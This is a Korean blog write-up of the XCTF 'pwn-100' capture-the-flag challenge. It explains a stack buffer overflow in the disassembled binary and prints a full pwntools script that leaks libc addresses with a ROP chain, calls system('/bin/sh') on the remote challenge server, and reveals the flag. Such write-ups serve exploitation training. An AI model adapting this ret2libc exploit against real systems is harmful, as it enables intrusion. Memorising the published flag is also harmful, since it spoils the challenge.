ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • pwn-100
    CTF/XCTF 2021. 2. 11. 02:52

    Disassembly 디스어셈블리


    undefined8 main()
    {
        setbuf(_reloc.stdin, 0);
        setbuf(_reloc.stdout, 0);
        do();
        return 0;
    }
    void do()
    {
        int64_t var_40h; // rbp-0x40
        
        _read(&var_40h, 200);
        puts("bye~");
        return;
    }
    void _read(void *addr, undefined8 size)
    {
        for(int i=0; i<size; i++){
        	read(0, addr+i, 1);
        }
        return;
    }

    do에서 _read를 호출해 rbp-0x40에 200바이트만큼 입력받아 스택 버퍼 오버플로우가 발생한다.

    Return Oriented Programming


    puts를 이용해 라이브러리 버전을 구한 다음 system("/bin/sh")를 호출하면 문제를 해결할 수 있다.

     

    Code

    더보기
    from pwn import *
    
    binary = "./pwn-100"
    lib = "../../lib/libc6_2.23-0ubuntu11_amd64.so"
    server = "111.200.241.244"
    port = 56580
    
    # context.log_level = 'debug'
    context.binary = binary
    
    if True:
    	p = remote(server, port)
    else:
    	p = gdb.debug([binary], gdbscript = 'set debug-file-directory ./x86_64-linux-gnu')
    
    e = ELF(binary)
    r = ROP(e)
    l = ELF(lib)
    
    e.checksec()
    
    prdi = r.find_gadget(['pop rdi', 'ret'])[0]
    
    puts_plt = e.plt["puts"]
    puts_got = e.got["puts"]
    setbuf_got = e.got["setbuf"]
    do = 0x40068e
    
    payload = b"\x90"*0x48
    payload += p64(prdi)
    payload += p64(puts_got)
    payload += p64(puts_plt)
    payload += p64(do)
    payload += b"\x90"*(200-len(payload))
    
    p.send(payload)
    
    p.recvline()
    puts = u64(p.recvline().strip().ljust(8, b"\x00"))
    libc = puts - l.symbols["puts"]
    
    log.info("libc : " + hex(libc))
    
    binsh = libc + next(l.search(b"/bin/sh\x00"))
    system = libc + l.symbols["system"]
    
    payload = b"\x90"*0x48
    payload += p64(prdi)
    payload += p64(binsh)
    payload += p64(system)
    payload += b"\x90"*(200-len(payload))
    
    p.send(payload)
    
    p.interactive()

    Flag

    cyberpeace{e8a8c2e39962c4cd00fde674e17d6886}

    'CTF > XCTF' 카테고리의 다른 글

    greeting  (0) 2021.02.11
    Recho  (0) 2021.02.11
    welpwn  (0) 2021.02.11
    Mary_Morton  (0) 2021.02.11
    int_overflow  (0) 2021.01.21

    댓글

Designed by Tistory.